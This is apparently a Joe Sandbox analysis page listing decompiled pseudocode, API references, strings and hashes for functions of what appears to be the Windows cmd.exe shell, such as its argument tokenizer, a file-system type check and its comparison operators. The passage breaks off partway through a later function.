Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: AttributesCurrentDirectoryFile_local_unwind4memsettowupper$FullNamePathiswalpha
String ID:
API String ID: 2497804757-0
Opcode ID: 5b73ef331f96ea5f26376c4fc0b245614fe8c66d5f8e0f593ddb5db56cb044b8
Instruction ID: d4fded2d2c077e4db8bb86b86240250572ee7f543586f2672a1406ff1f13efbb
Opcode Fuzzy Hash: 5b73ef331f96ea5f26376c4fc0b245614fe8c66d5f8e0f593ddb5db56cb044b8
Instruction Fuzzy Hash: 87B16E70A041259ACB28EBA4E949FBDB374AF74310F55856DE42AE7290EB70DF80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001BEA40 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 413
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E001BEA40(signed short* __ecx, wchar_t* __edx, signed int _a4) {
				long _v8;
				signed int _v12;
				long _v16;
				wchar_t* _v20;
				long _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				long _v236;
				char* _v260;
				char _v264;
				wchar_t* _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				signed int _t79;
				signed short _t81;
				signed int _t82;
				long _t83;
				wchar_t* _t85;
				signed char _t86;
				signed int _t87;
				int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				long _t94;
				signed int _t96;
				signed int _t104;
				signed int _t105;
				void* _t108;
				signed int _t109;
				signed int _t110;
				signed int* _t113;
				signed int _t114;
				signed int _t115;
				long _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				wchar_t* _t126;
				intOrPtr _t127;
				signed int _t128;
				signed int _t129;
				void* _t130;
				long _t134;
				wchar_t* _t135;
				wchar_t* _t136;
				signed int* _t137;
				intOrPtr* _t138;
				signed short* _t143;
				long _t144;
				long _t145;
				signed int _t150;
				signed int _t158;
				signed int _t159;
				long _t160;
				long _t164;
				void* _t169;
				signed int _t172;
				long _t173;
				signed int _t177;
				void* _t179;
				signed int _t180;
				signed int _t183;
				signed short* _t185;
				signed short* _t186;
				long _t187;
				signed int* _t188;
				signed int _t190;
				signed int _t191;
				void* _t193;

				_t167 = __edx;
				_t138 = __ecx;
				_t73 =  *0x1dd0b4; // 0xea614d48
				_v12 = _t73 ^ _t191;
				_t186 = __ecx;
				_t136 = __edx;
				if(__ecx == 0) {
					_t139 = 4;
					_t75 = E001C00B0(4);
					__eflags = _t75;
					if(_t75 != 0) {
						goto L23;
					} else {
						E001D9287(4);
						__imp__longjmp(0x1eb8b8, 1);
						goto L95;
					}
				} else {
					_t2 = _t138 + 2; // 0x2
					_t179 = _t2;
					do {
						_t127 =  *_t138;
						_t138 = _t138 + 2;
					} while (_t127 != 0);
					_t139 = 4 + (_t138 - _t179 >> 1) * 4;
					_t128 = E001C00B0(4 + (_t138 - _t179 >> 1) * 4);
					_v236 = _t128;
					if(_t128 == 0) {
						L95:
						E001D9287(_t139);
						__imp__longjmp(0x1eb8b8, 1);
						goto L96;
					} else {
						_v228 = _t128;
						_t185 = L"=,;";
						_t129 = 0;
						_v220 = 0;
						while(1) {
							_t164 =  *_t185 & 0x0000ffff;
							_v224 = _t164;
							if(_t164 == 0) {
								break;
							}
							if(_t136 == 0) {
								L9:
								 *(_t191 + _t129 * 2 - 0xd4) = _t164;
								_t129 = _t129 + 1;
								_v220 = _t129;
							} else {
								_t135 = wcschr(_t136, _t164);
								_t193 = _t193 + 8;
								_t129 = _v220;
								if(_t135 == 0) {
									_t164 = _v224;
									goto L9;
								}
							}
							_t185 =  &(_t185[1]);
							if(_t129 < 0x63) {
								continue;
							}
							break;
						}
						_t183 = _v228;
						_t130 = _t129 + _t129;
						if(_t130 >= 0xc8) {
							E001C711D(_t130, _t136, _t164, _t179, _t183, _t186);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t191);
							_push(_t136);
							_push(_t186);
							_v264 = 0;
							_push(_t183);
							__eflags = 0;
							_v260 =  &_v264;
							_t136 = E001BE9A0(0, 0);
							_v268 = _t136;
							goto L62;
						} else {
							_v224 = 1;
							 *((short*)(_t191 + _t130 - 0xd4)) = 0;
							_t134 =  *_t186 & 0x0000ffff;
							_v220 = 1;
							if(_t134 != 0) {
								_t144 = _t134;
								L14:
								if(_t144 == 0x22) {
									L17:
									_v224 = 0;
									if(_t136 == 0) {
										L19:
										 *_t180 =  *_t186;
										_t180 = _t180 + 2;
										if( *_t186 == 0x22) {
											while(1) {
												_t81 = _t186[1];
												_t143 = _t186;
												_t186 =  &(_t186[1]);
												 *_t180 = _t81;
												_t180 = _t180 + 2;
												_t82 =  *_t186 & 0x0000ffff;
												__eflags = _t82;
												if(_t82 == 0) {
													break;
												}
												__eflags = _t82 - 0x22;
												if(_t82 == 0x22) {
													goto L20;
												} else {
													__eflags = _t186[1];
													if(_t186[1] != 0) {
														continue;
													} else {
														goto L20;
													}
												}
												goto L22;
											}
											_t186 = _t143;
										}
										L20:
										_v220 = 0;
									} else {
										_t85 = wcschr(_t136,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t85 != 0) {
											_t86 = _a4;
											__eflags = _t86 & 0x00000002;
											if((_t86 & 0x00000002) != 0) {
												__eflags = _v220;
												_t87 =  *_t186 & 0x0000ffff;
												if(_v220 == 0) {
													_t180 = _t180 + 2;
												}
												 *_t180 = _t87;
												_v220 = 1;
												_t180 = _t180 + 4;
											} else {
												__eflags = _t86 & 0x00000004;
												if((_t86 & 0x00000004) != 0) {
													 *_t180 =  *_t186;
												}
												_v220 = 0;
												_t180 = _t180 + 2;
											}
										} else {
											goto L19;
										}
									}
									_t83 = _t186[1] & 0x0000ffff;
									_t186 =  &(_t186[1]);
									_t144 = _t83;
									if(_t83 != 0) {
										goto L14;
									}
								} else {
									_t89 = iswspace(_t144);
									_t193 = _t193 + 4;
									if(_t89 != 0) {
										L24:
										_t90 = _a4;
										__eflags = _t90 & 0x00000001;
										if((_t90 & 0x00000001) != 0) {
											__eflags = _v224;
											if(_v224 == 0) {
												goto L17;
											} else {
												goto L25;
											}
										} else {
											L25:
											_t91 = _t90 & 0x00000002;
											__eflags = _t91;
											_v228 = _t91;
											if(_t91 == 0) {
												L28:
												_t93 = _a4 & 0x00000004;
												__eflags = _t93;
												_v232 = _t93;
												if(_t93 != 0) {
													L96:
													_t79 = E001BD7D4(_t136,  *_t186);
													__eflags = _t79;
													if(_t79 != 0) {
														goto L17;
													} else {
														goto L29;
													}
												} else {
													L29:
													_t94 =  *_t186 & 0x0000ffff;
													__eflags = _t94;
													if(_t94 != 0) {
														_t160 = _t94;
														while(1) {
															__eflags = _t160 - 0x22;
															if(_t160 == 0x22) {
																break;
															}
															_t114 = iswspace(_t160);
															_t193 = _t193 + 4;
															__eflags = _t114;
															if(_t114 != 0) {
																L39:
																__eflags = _v228;
																if(_v228 == 0) {
																	L42:
																	__eflags = _v232;
																	if(_v232 != 0) {
																		_t115 = E001BD7D4(_t136,  *_t186);
																		__eflags = _t115;
																		if(_t115 != 0) {
																			break;
																		} else {
																			goto L43;
																		}
																	} else {
																		L43:
																		_t116 = _t186[1] & 0x0000ffff;
																		_t186 =  &(_t186[1]);
																		_t160 = _t116;
																		__eflags = _t116;
																		if(_t116 != 0) {
																			continue;
																		} else {
																		}
																	}
																} else {
																	__eflags = _t136;
																	if(_t136 == 0) {
																		goto L42;
																	} else {
																		_t118 = wcschr(_t136,  *_t186 & 0x0000ffff);
																		_t193 = _t193 + 8;
																		__eflags = _t118;
																		if(_t118 != 0) {
																			break;
																		} else {
																			goto L42;
																		}
																	}
																}
															} else {
																_t121 = wcschr( &_v216,  *_t186 & 0x0000ffff);
																_t193 = _t193 + 8;
																__eflags = _t121;
																if(_t121 != 0) {
																	goto L39;
																} else {
																	break;
																}
															}
															goto L22;
														}
														__eflags =  *_t186;
														if( *_t186 != 0) {
															__eflags = _v224;
															if(_v224 == 0) {
																__eflags = _v220;
																if(_v220 == 0) {
																	_t180 = _t180 + 2;
																	__eflags = _t180;
																}
															}
															_v220 = 1;
															goto L17;
														}
													}
												}
											} else {
												__eflags = _t136;
												if(_t136 == 0) {
													goto L28;
												} else {
													_t123 = wcschr(_t136,  *_t186 & 0x0000ffff);
													_t193 = _t193 + 8;
													__eflags = _t123;
													if(_t123 != 0) {
														goto L17;
													} else {
														goto L28;
													}
												}
											}
										}
									} else {
										_t126 = wcschr( &_v216,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t126 != 0) {
											goto L24;
										} else {
											goto L17;
										}
									}
								}
							}
							L22:
							_t145 = _v236;
							_t180 = _t180 - _t145 >> 1;
							_t167 = 4 + _t180 * 2;
							if(E001C0100(_t145, 4 + _t180 * 2) == 0) {
								E001D9287(_t145);
								__imp__longjmp(0x1eb8b8, 1);
								asm("int3");
								L102:
								_t169 = _t145 + 2;
								do {
									_t96 =  *_t145;
									_t145 = _t145 + 2;
									__eflags = _t96;
								} while (_t96 != 0);
								_t183 = _t180 + (_t145 - _t169 >> 1);
								L68:
								_t148 = _t183 + _t183;
								_t187 = E001C00B0(_t183 + _t183);
								_v8 = _t187;
								__eflags = _t187;
								if(_t187 == 0) {
									E001D9287(_t148);
									__imp__longjmp(0x1eb8b8, 1);
									asm("int3");
									__eflags =  *0x1efa90;
									if( *0x1efa90 != 0) {
										E001D82EB(_t148);
									}
									__eflags = 0;
									__eflags =  *0x1efa88;
									 *0x1dd5c8 = 0;
									if( *0x1efa88 != 0) {
										E001D8121(_t187, 0);
									}
									return _t187;
								}
								_t150 = _t136[0xf];
								__eflags = _t150;
								if(_t150 != 0) {
									E001C1040(_t187, _t183, _t150);
								}
								_t104 = 0;
								__eflags = _t183;
								if(_t183 == 0) {
									L106:
									_t104 = 0x80070057;
								} else {
									__eflags = _t183 - 0x7fffffff;
									if(_t183 > 0x7fffffff) {
										goto L106;
									}
								}
								__eflags = _t104;
								if(_t104 < 0) {
									L109:
									_t172 = 0;
								} else {
									_t104 = 0;
									_t159 = _t183;
									_t173 = _t187;
									__eflags = _t183;
									if(_t183 == 0) {
										L108:
										_t104 = 0x80070057;
										goto L109;
									} else {
										while(1) {
											__eflags =  *_t173 - _t104;
											if( *_t173 == _t104) {
												break;
											}
											_t173 = _t173 + 2;
											_t159 = _t159 - 1;
											__eflags = _t159;
											if(_t159 != 0) {
												continue;
											} else {
												goto L108;
											}
											goto L114;
										}
										__eflags = _t159;
										if(_t159 == 0) {
											goto L108;
										} else {
											_t172 = _t183 - _t159;
											__eflags = _t172;
										}
									}
								}
								__eflags = _t104;
								if(_t104 >= 0) {
									_t113 = _v8 + _t172 * 2;
									_t190 = _t183 - _t172;
									__eflags = _t190;
									if(_t190 == 0) {
										L83:
										_t113 = _t113 - 2;
									} else {
										_t177 = _t172 + 0x7ffffffe + _t190 - _t183;
										_t183 = 0x1efaa0 - _t113;
										__eflags = 0x1efaa0;
										while(1) {
											__eflags = _t177;
											if(_t177 == 0) {
												break;
											}
											_t158 =  *(_t113 + _t183) & 0x0000ffff;
											__eflags = _t158;
											if(_t158 == 0) {
												break;
											} else {
												 *_t113 = _t158;
												_t177 = _t177 - 1;
												_t113 =  &(_t113[0]);
												_t190 = _t190 - 1;
												__eflags = _t190;
												if(_t190 != 0) {
													continue;
												} else {
													goto L83;
												}
											}
											goto L85;
										}
										__eflags = _t190;
										if(_t190 == 0) {
											goto L83;
										}
									}
									L85:
									_t187 = _v8;
									__eflags = 0;
									 *_t113 = 0;
								}
								_t136[0xf] = _t187;
								while(1) {
									L62:
									_t105 = E001BEEC8();
									__eflags = _t105;
									if(_t105 == 0) {
										break;
									}
									_t108 = E001BF030(1);
									__eflags = _t108 - 0x4000;
									if(_t108 == 0x4000) {
										_t145 = _t136[0xf];
										_t180 =  *0x1efa8c;
										__eflags = _t145;
										if(_t145 != 0) {
											goto L102;
										}
										goto L68;
									} else {
										_t188 = _v12;
										_t109 = E001C02B0(_t136, _t188, _t183, _t188);
										__eflags = _t109;
										if(_t109 != 0) {
											_t110 =  *_t188;
											do {
												_t69 = _t110 + 0x14; // 0x14
												_t137 = _t69;
												_t110 =  *_t137;
												_v12 = _t137;
												__eflags = _t110;
											} while (_t110 != 0);
											_t136 = _v20;
											continue;
										} else {
											__eflags = 0;
											E001BF300(_t109, 0, 0, _t109);
										}
									}
									break;
								}
								_t136[0xd] = _v16;
								return _t136;
							} else {
								L23:
								return E001C6FD0(_t75, _t136, _v12 ^ _t191, _t167, _t180, _t186);
							}
						}
					}
				}
				goto L114;
			}

0x001bea40
0x001bea40
0x001bea4b
0x001bea52
0x001bea57
0x001bea59
0x001bea5e
0x001bed52
0x001bed57
0x001bed5c
0x001bed5e
0x00000000
0x001bed64
0x001cc03d
0x001cc049
0x00000000
0x001cc049
0x001bea64
0x001bea64
0x001bea64
0x001bea67
0x001bea67
0x001bea6a
0x001bea6d
0x001bea76
0x001bea7d
0x001bea82
0x001bea8a
0x001cc04f
0x001cc04f
0x001cc05b
0x00000000
0x001bea90
0x001bea90
0x001bea96
0x001bea9b
0x001bea9d
0x001beaa3
0x001beaa3
0x001beaa6
0x001beaaf
0x00000000
0x00000000
0x001beab3
0x001bead0
0x001bead0
0x001bead8
0x001bead9
0x001beab5
0x001beab7
0x001beabd
0x001beac2
0x001beac8
0x001beaca
0x00000000
0x001beaca
0x001beac8
0x001beadf
0x001beae5
0x00000000
0x00000000
0x00000000
0x001beae5
0x001beae7
0x001beaed
0x001beaf4
0x001bed75
0x001bed7a
0x001bed7b
0x001bed7c
0x001bed7d
0x001bed7e
0x001bed7f
0x001bed82
0x001bed88
0x001bed89
0x001bed8d
0x001bed94
0x001bed95
0x001bed97
0x001bed9f
0x001beda1
0x00000000
0x001beafa
0x001beafc
0x001beb06
0x001beb0e
0x001beb11
0x001beb1e
0x001beb24
0x001beb26
0x001beb2a
0x001beb5a
0x001beb5a
0x001beb66
0x001beb7e
0x001beb81
0x001beb84
0x001beb8b
0x001becf0
0x001becf0
0x001becf4
0x001becf6
0x001becf9
0x001becfc
0x001becff
0x001bed02
0x001bed05
0x00000000
0x00000000
0x001bed07
0x001bed0a
0x00000000
0x001bed10
0x001bed10
0x001bed15
0x00000000
0x001bed17
0x00000000
0x001bed17
0x001bed15
0x00000000
0x001bed0a
0x001bed6e
0x001bed6e
0x001beb91
0x001beb91
0x001beb68
0x001beb6d
0x001beb73
0x001beb78
0x001beccd
0x001becd0
0x001becd2
0x001bed1c
0x001bed23
0x001bed26
0x001bed69
0x001bed69
0x001bed28
0x001bed2e
0x001bed38
0x001becd4
0x001becd4
0x001becd6
0x001cc092
0x001cc092
0x001becdc
0x001bece6
0x001bece6
0x00000000
0x00000000
0x00000000
0x001beb78
0x001beb9b
0x001beb9f
0x001beba2
0x001beba7
0x00000000
0x00000000
0x001beb2c
0x001beb2d
0x001beb33
0x001beb38
0x001bebde
0x001bebde
0x001bebe1
0x001bebe3
0x001bed40
0x001bed47
0x00000000
0x001bed4d
0x00000000
0x001bed4d
0x001bebe9
0x001bebe9
0x001bebe9
0x001bebe9
0x001bebec
0x001bebf2
0x001bec0e
0x001bec11
0x001bec11
0x001bec14
0x001bec1a
0x001cc061
0x001cc066
0x001cc06b
0x001cc06d
0x00000000
0x001cc073
0x00000000
0x001cc073
0x001bec20
0x001bec20
0x001bec20
0x001bec23
0x001bec26
0x001bec28
0x001bec30
0x001bec30
0x001bec34
0x00000000
0x00000000
0x001bec37
0x001bec3d
0x001bec40
0x001bec42
0x001bec8a
0x001bec8a
0x001bec91
0x001beca9
0x001beca9
0x001becb0
0x001cc07d
0x001cc082
0x001cc084
0x00000000
0x001cc08a
0x00000000
0x001cc08a
0x001becb6
0x001becb6
0x001becb6
0x001becba
0x001becbd
0x001becbf
0x001becc2
0x00000000
0x00000000
0x001becc8
0x001becc2
0x001bec93
0x001bec93
0x001bec95
0x00000000
0x001bec97
0x001bec9c
0x001beca2
0x001beca5
0x001beca7
0x00000000
0x00000000
0x00000000
0x00000000
0x001beca7
0x001bec95
0x001bec44
0x001bec4f
0x001bec55
0x001bec58
0x001bec5a
0x00000000
0x00000000
0x00000000
0x00000000
0x001bec5a
0x00000000
0x001bec42
0x001bec5c
0x001bec60
0x001bec66
0x001bec6d
0x001bec6f
0x001bec76
0x001bec78
0x001bec78
0x001bec78
0x001bec76
0x001bec7b
0x00000000
0x001bec7b
0x001bec60
0x001bec26
0x001bebf4
0x001bebf4
0x001bebf6
0x00000000
0x001bebf8
0x001bebfd
0x001bec03
0x001bec06
0x001bec08
0x00000000
0x00000000
0x00000000
0x00000000
0x001bec08
0x001bebf6
0x001bebf2
0x001beb3e
0x001beb49
0x001beb4f
0x001beb54
0x00000000
0x00000000
0x00000000
0x00000000
0x001beb54
0x001beb38
0x001beb2a
0x001bebad
0x001bebad
0x001bebb5
0x001bebb7
0x001bebc5
0x001cc09a
0x001cc0a6
0x001cc0ac
0x001cc0ad
0x001cc0ad
0x001cc0b0
0x001cc0b0
0x001cc0b3
0x001cc0b6
0x001cc0b6
0x001cc0bf
0x001bedfa
0x001bedfa
0x001bee02
0x001bee04
0x001bee07
0x001bee09
0x001cc0f7
0x001cc103
0x001cc109
0x001cc10a
0x001cc111
0x001cc117
0x001cc117
0x001befe1
0x001befe3
0x001befea
0x001befef
0x001cc125
0x001cc125
0x00000000
0x001beff5
0x001bee0f
0x001bee12
0x001bee14
0x001cc0cb
0x001cc0cb
0x001bee1a
0x001bee1c
0x001bee1e
0x001cc0d5
0x001cc0d5
0x001bee24
0x001bee24
0x001bee2a
0x00000000
0x00000000
0x001bee2a
0x001bee30
0x001bee32
0x001cc0f0
0x001cc0f0
0x001bee38
0x001bee38
0x001bee3a
0x001bee3c
0x001bee3e
0x001bee40
0x001cc0eb
0x001cc0eb
0x00000000
0x001bee46
0x001bee46
0x001bee46
0x001bee49
0x00000000
0x00000000
0x001cc0df
0x001cc0e2
0x001cc0e2
0x001cc0e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001cc0e5
0x001bee4f
0x001bee51
0x00000000
0x001bee57
0x001bee59
0x001bee59
0x001bee59
0x001bee51
0x001bee40
0x001bee5b
0x001bee5d
0x001bee64
0x001bee67
0x001bee67
0x001bee69
0x001bee99
0x001bee99
0x001bee6b
0x001bee7a
0x001bee7c
0x001bee7c
0x001bee80
0x001bee80
0x001bee82
0x00000000
0x00000000
0x001bee84
0x001bee88
0x001bee8b
0x00000000
0x001bee8d
0x001bee8d
0x001bee90
0x001bee91
0x001bee94
0x001bee94
0x001bee97
0x00000000
0x00000000
0x00000000
0x00000000
0x001bee97
0x00000000
0x001bee8b
0x001bee9e
0x001beea0
0x00000000
0x00000000
0x001beea0
0x001beea2
0x001beea2
0x001beea5
0x001beea7
0x001beea7
0x001beeaa
0x001beda4
0x001beda4
0x001beda4
0x001beda9
0x001bedab
0x00000000
0x00000000
0x001bedb2
0x001bedb7
0x001bedbc
0x001bede9
0x001bedec
0x001bedf2
0x001bedf4
0x00000000
0x00000000
0x00000000
0x001bedbe
0x001bedbe
0x001bedc3
0x001bedc8
0x001bedca
0x001beeb2
0x001beeb4
0x001beeb4
0x001beeb4
0x001beeb7
0x001beeb9
0x001beebc
0x001beebc
0x001beec0
0x00000000
0x001bedd0
0x001bedd3
0x001bedd5
0x001bedd5
0x001bedca
0x00000000
0x001bedbc
0x001bedde
0x001bede8
0x001bebcb
0x001bebcb
0x001bebdb
0x001bebdb
0x001bebc5
0x001beaf4
0x001bea8a
0x00000000

APIs

wcschr.MSVCRT ref: 001BEAB7
iswspace.MSVCRT ref: 001BEB2D
wcschr.MSVCRT ref: 001BEB49
wcschr.MSVCRT ref: 001BEB6D
wcschr.MSVCRT ref: 001BEBFD
iswspace.MSVCRT ref: 001BEC37
wcschr.MSVCRT ref: 001BEC4F
wcschr.MSVCRT ref: 001BEC9C
longjmp.MSVCRT(001EB8B8,00000001,00000000,?,?), ref: 001CC049
longjmp.MSVCRT(001EB8B8,00000001), ref: 001CC05B

Strings

=,;, xrefs: 001BEA96

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: wcschr$iswspacelongjmp
String ID: =,;
API String ID: 4008636219-1539845467
Opcode ID: 82418b24dedcce8a33a3a6cfa1fabedfe5a6a3c71f5b1f35a10133ba5eb715c2
Instruction ID: f6b5835121ab7742ef17ae72ba51eb70a48e7737f040a5d71ebf0f1f3217a2e2
Opcode Fuzzy Hash: 82418b24dedcce8a33a3a6cfa1fabedfe5a6a3c71f5b1f35a10133ba5eb715c2
Instruction Fuzzy Hash: 1BD1F275A00215CBDF249F68C9857FA77E5EFA0304F15446EEC4AAB281EB74CD84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001DB9D3 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E001DB9D3(void* __ecx, char __edx, char _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				char _v1085;
				long _v1092;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				void* _t63;
				WCHAR* _t64;
				int _t65;
				WCHAR* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				WCHAR* _t73;
				WCHAR* _t81;
				void* _t89;
				WCHAR* _t90;
				signed int _t91;

				_t88 = __edx;
				_t41 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t41 ^ _t91;
				_v1085 = __edx;
				_t90 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t73 = 1;
				_t89 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				if(E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E001C0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L27:
					_t90 = _t73;
					goto L28;
				} else {
					_t63 = _v564;
					if(_t63 == 0) {
						_t63 =  &_v1084;
					}
					__imp__GetVolumePathNameW(_t89, _t63, _v556);
					if(_t63 == 0) {
						goto L27;
					} else {
						_t64 = _v564;
						if(_t64 == 0) {
							_t64 =  &_v1084;
						}
						_t65 = GetDriveTypeW(_t64);
						if(_t65 == 0 || _t65 == 4) {
							_t73 = _t90;
							goto L27;
						} else {
							_t66 = _v28;
							if(_t66 == 0) {
								_t66 =  &_v548;
							}
							_t81 = _v564;
							if(_t81 == 0) {
								_t81 =  &_v1084;
							}
							if(GetVolumeInformationW(_t81, _t90, _t90, _t90,  &_v1092,  &_v1092, _t66, _v20) == 0) {
								goto L27;
							} else {
								_t69 = _v28;
								if(_t69 == 0) {
									_t69 =  &_v548;
								}
								__imp___wcsicmp(_t69, L"NTFS");
								if(_t69 != 0) {
									if(_a4 == 0) {
										L21:
										if(_v1085 == 0) {
											L28:
											_t73 = _t90;
										} else {
											_t70 = _v28;
											if(_t70 == 0) {
												_t70 =  &_v548;
											}
											__imp___wcsicmp(_t70, L"CSVFS");
											if(_t70 != 0) {
												goto L28;
											} else {
											}
										}
									} else {
										_t71 = _v28;
										if(_t71 == 0) {
											_t71 =  &_v548;
										}
										__imp___wcsicmp(_t71, L"REFS");
										if(_t71 != 0) {
											goto L21;
										}
									}
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v564);
				__imp__??_V@YAXPAX@Z();
				return E001C6FD0(_t73, _t73, _v8 ^ _t91, _t88, _t89, _t90, _v28);
			}

0x001db9d3
0x001db9de
0x001db9e5
0x001db9f0
0x001db9f7
0x001db9f9
0x001db9fe
0x001dba07
0x001dba0a
0x001dba0c
0x001dba0f
0x001dba17
0x001dba22
0x001dba28
0x001dba37
0x001dba60
0x001dbb85
0x001dbb85
0x00000000
0x001dba90
0x001dba90
0x001dba98
0x001dba9a
0x001dba9a
0x001dbaa8
0x001dbab0
0x00000000
0x001dbab6
0x001dbab6
0x001dbabe
0x001dbac0
0x001dbac0
0x001dbac7
0x001dbacf
0x001dbb83
0x00000000
0x001dbade
0x001dbade
0x001dbae3
0x001dbae5
0x001dbae5
0x001dbaeb
0x001dbaf3
0x001dbaf5
0x001dbaf5
0x001dbb13
0x00000000
0x001dbb15
0x001dbb15
0x001dbb1a
0x001dbb1c
0x001dbb1c
0x001dbb28
0x001dbb32
0x001dbb38
0x001dbb59
0x001dbb60
0x001dbb87
0x001dbb87
0x001dbb62
0x001dbb62
0x001dbb67
0x001dbb69
0x001dbb69
0x001dbb75
0x001dbb7f
0x00000000
0x00000000
0x001dbb81
0x001dbb7f
0x001dbb3a
0x001dbb3a
0x001dbb3f
0x001dbb41
0x001dbb41
0x001dbb4d
0x001dbb57
0x00000000
0x00000000
0x001dbb57
0x001dbb38
0x001dbb32
0x001dbb13
0x001dbacf
0x001dbab0
0x001dbb8f
0x001dbb99
0x001dbbb2

APIs

memset.MSVCRT ref: 001DBA0F
memset.MSVCRT ref: 001DBA37

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 001DBAA8
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 001DBAC7
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 001DBB0B
_wcsicmp.MSVCRT ref: 001DBB28
_wcsicmp.MSVCRT ref: 001DBB4D
_wcsicmp.MSVCRT ref: 001DBB75
??_V@YAXPAX@Z.MSVCRT ref: 001DBB8F
??_V@YAXPAX@Z.MSVCRT ref: 001DBB99

Strings

CSVFS, xrefs: 001DBB6F
REFS, xrefs: 001DBB47
NTFS, xrefs: 001DBB22

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
String ID: CSVFS$NTFS$REFS
API String ID: 3510147486-2605508654
Opcode ID: f4cf678001a407ab63e8325d62e6faa97189756a74c6ee5771abfbddc28ff294
Instruction ID: 52b13d8fda63b811a2cf40d9727d410d67215e85b096c7fb5e343d734b6dc2e8
Opcode Fuzzy Hash: f4cf678001a407ab63e8325d62e6faa97189756a74c6ee5771abfbddc28ff294
Instruction Fuzzy Hash: 7B513271A04219ABDF20DBA5DCC9BEEBBB8EB14354F4500ABE505D3251EB34DE84CB64

Uniqueness

Uniqueness Score: -1.00%

Function 001B9520 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 001B95E4
_wcsicmp.MSVCRT ref: 001B95F6
_wcsicmp.MSVCRT ref: 001B9608
_wcsicmp.MSVCRT ref: 001B961A
_wcsicmp.MSVCRT ref: 001B962C
_wcsicmp.MSVCRT ref: 001B9682

Strings

NEQ, xrefs: 001B95F0
LEQ, xrefs: 001B9614
GEQ, xrefs: 001B967C
EQU, xrefs: 001B95DE
GTR, xrefs: 001B9626
LSS, xrefs: 001B9602

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsicmp
String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
API String ID: 2081463915-3124875276
Opcode ID: 3391ed98f08154c105bf1d5614122c1969f2efefbcf45be620badf381bcfe638
Instruction ID: ee89b6e7366246ae30ad94158f27f0bcc6afd22c2d0d80a90f1d012d84e40a32
Opcode Fuzzy Hash: 3391ed98f08154c105bf1d5614122c1969f2efefbcf45be620badf381bcfe638
Instruction Fuzzy Hash: 0B4108312447019AE7396F34ECA5BFA77A5EB64720F21042FE2069AAD0EF72D487C715

Uniqueness

Uniqueness Score: -1.00%

Function 001C06C0 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E001C06C0(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t15;
				void* _t16;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t26;
				void* _t27;
